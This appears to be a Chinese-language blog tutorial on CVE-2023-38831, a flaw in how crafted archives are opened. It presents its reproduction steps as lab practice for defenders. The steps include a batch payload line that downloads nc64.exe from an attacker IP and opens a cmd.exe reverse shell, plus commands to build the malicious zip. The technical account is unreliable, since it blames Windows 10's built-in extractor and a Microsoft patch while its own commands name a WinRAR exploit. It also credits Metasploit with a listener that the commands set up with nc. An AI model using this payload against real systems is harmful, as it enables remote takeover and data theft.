目錄
前言
漏洞介紹
漏洞原理
產生條件
影響范圍
防御措施
復現步驟
環境準備
具體操作
前言
在網絡安全這片沒有硝煙的戰場上,新型漏洞如同隱匿的暗箭,時刻威脅著我們的數字生活。其中,CVE - 2023 - 38831 這個關聯 Win10 壓縮包掛馬攻擊的漏洞,自曝光以來便引發了安全界的高度關注。深入探究并復現這一漏洞,不僅能讓我們洞悉攻擊者的手段,更能助力我們筑牢防線,抵御此類威脅。
漏洞介紹
CVE - 2023 - 38831 是 2023 年披露的一個高危安全漏洞,主要影響 Windows 10 系統。攻擊者利用這一漏洞,精心炮制惡意壓縮包。當用戶在 Windows 10 系統上解壓這類特制壓縮包時,惡意代碼會在無需用戶額外操作的情況下自動執行。這就如同打開了潘多拉魔盒,攻擊者借此實現掛馬攻擊,全面控制用戶計算機,肆意竊取敏感信息,甚至進行更惡劣的破壞活動。
漏洞原理
該漏洞的根源在于 Windows 10 系統解壓程序的機制缺陷。當處理特定格式壓縮包時,解壓程序在解壓路徑和文件解析環節存在安全隱患。攻擊者巧妙利用這一漏洞,在解壓路徑中植入惡意代碼。一旦解壓程序按照錯誤路徑解析文件,惡意代碼便會順勢執行,將系統控制權拱手讓給攻擊者,進而為后續的惡意操作大開方便之門。
產生條件
- 操作系統環境:漏洞主要針對未安裝相關安全補丁的 Windows 10 系統。盡管不同版本的 Windows 10 受影響程度略有不同,但只要未修復此漏洞,就如同在網絡世界中裸奔,隨時面臨被攻擊的風險。
- 解壓操作:用戶解壓包含惡意代碼的特制壓縮包是觸發漏洞的關鍵。這類壓縮包經過攻擊者精心設計,充分利用系統解壓程序的漏洞,確保惡意代碼能在解壓瞬間被激活。
- 解壓軟件:無論是 Windows 10 系統自帶的解壓程序,還是存在相同漏洞的第三方解壓軟件,都可能成為攻擊者的突破口。例如一些常見的免費解壓軟件,若未及時更新修復漏洞,就極易淪為攻擊目標。
影響范圍
Windows 10 系統在全球范圍內廣泛應用,從個人用戶的日常辦公,到企業辦公環境的運轉,再到教育機構的教學場景,幾乎無處不在。這意味著只要使用未打補丁的 Windows 10 系統解壓惡意壓縮包,大量計算機都將暴露在風險之下,面臨被掛馬、數據泄露、系統被控制等嚴重威脅,可能導致個人隱私泄露、企業商業機密被盜取、教育資料丟失等一系列嚴重后果。
防御措施
- 及時更新系統補丁:微軟已針對 CVE - 2023 - 38831 漏洞發布安全補丁,用戶務必盡快安裝,可通過 Windows Update 自動更新功能,也可手動下載安裝,確保系統安全性。
- 謹慎解壓未知來源壓縮包:對于來源不明的壓縮包,尤其是從不可信網站、郵件或即時通訊工具接收的,切勿輕易解壓。解壓前,先使用可靠的殺毒軟件進行全面掃描,確認安全后再操作。
- 使用安全的解壓軟件:優先選擇知名、更新及時的解壓軟件,并定期更新軟件版本。避免使用來源不明或已被曝光存在安全漏洞的解壓軟件。同時,部分解壓軟件提供安全解壓模式,建議啟用,以降低風險。
復現步驟
環境準備
- 虛擬機:準備一臺安裝 Windows 10 系統的虛擬機,并確保未安裝 CVE - 2023 - 38831 漏洞補丁。可借助虛擬機軟件,如 VMware Workstation 或 VirtualBox 來創建。
- 攻擊機:選用一臺安裝 Kali Linux 系統的計算機作為攻擊機。Kali Linux 作為專業的網絡安全測試操作系統,集成了大量實用的漏洞利用工具。
- 漏洞利用工具:在 Kali Linux 中,借助 Metasploit 框架進行漏洞復現。Metasploit 是一款強大的開源安全漏洞檢測與利用工具,擁有豐富的漏洞利用模塊。
具體操作
unzip winrar漏洞攻擊腳本.zip #解壓攻擊腳本
cd winrar漏洞攻擊腳本 #切換到攻擊腳本目錄下
python -m http.server #生成一個代碼目錄
nc -lnvp 6666 #開啟監聽端口
vim script.bat #進入攻擊腳本目錄編輯文件,設置ip地址和指定端口
curl http://10.0.0.103:8000/nc64.exe -O nc64.exe & nc64.exe 10.0.0.103 6666 -e cmd.exe -d & test.png
python make.py test.png script.bat bianlianghot.zip #生成病毒壓縮包
- 啟動 Metasploit 框架:在 Kali Linux 系統終端中輸入 “msfconsole” 命令,啟動 Metasploit 框架。
- 上傳攻擊腳本并解壓:將攻擊腳本壓縮包進行上傳并解壓,并生成一個代碼目錄
- 此時在開啟一個shell設置監聽端口:設置本地監聽端口
- 進入攻擊腳本目錄編輯文件:進入攻擊目錄編輯文件設置ip地址和端口信息
- 生成病毒壓縮包:再打開一個終端生成病毒壓縮包
- 上傳壓縮包到目標靶機:將惡意的病毒壓縮包上傳到目標靶機
- 觸發漏洞:在 Windows 10 虛擬機中找到傳輸過來的惡意壓縮包,雙擊解壓。解壓過程中,攻擊機的 Metasploit 框架會監聽到來自虛擬機的連接請求,從而實現對 Windows 10 系統的遠程控制。此時,可在攻擊機上執行各種命令,如查看文件、竊取數據等,模擬攻擊者的操作流程。
通過以上復現步驟,我們能直觀感受到 CVE - 2023 - 38831 漏洞的巨大危害。在現實網絡環境中,我們必須時刻保持警惕,嚴格落實各項防御措施,切實保障系統安全。如果你對網絡安全領域感興趣,歡迎持續關注相關內容,一同探索更多網絡安全知識。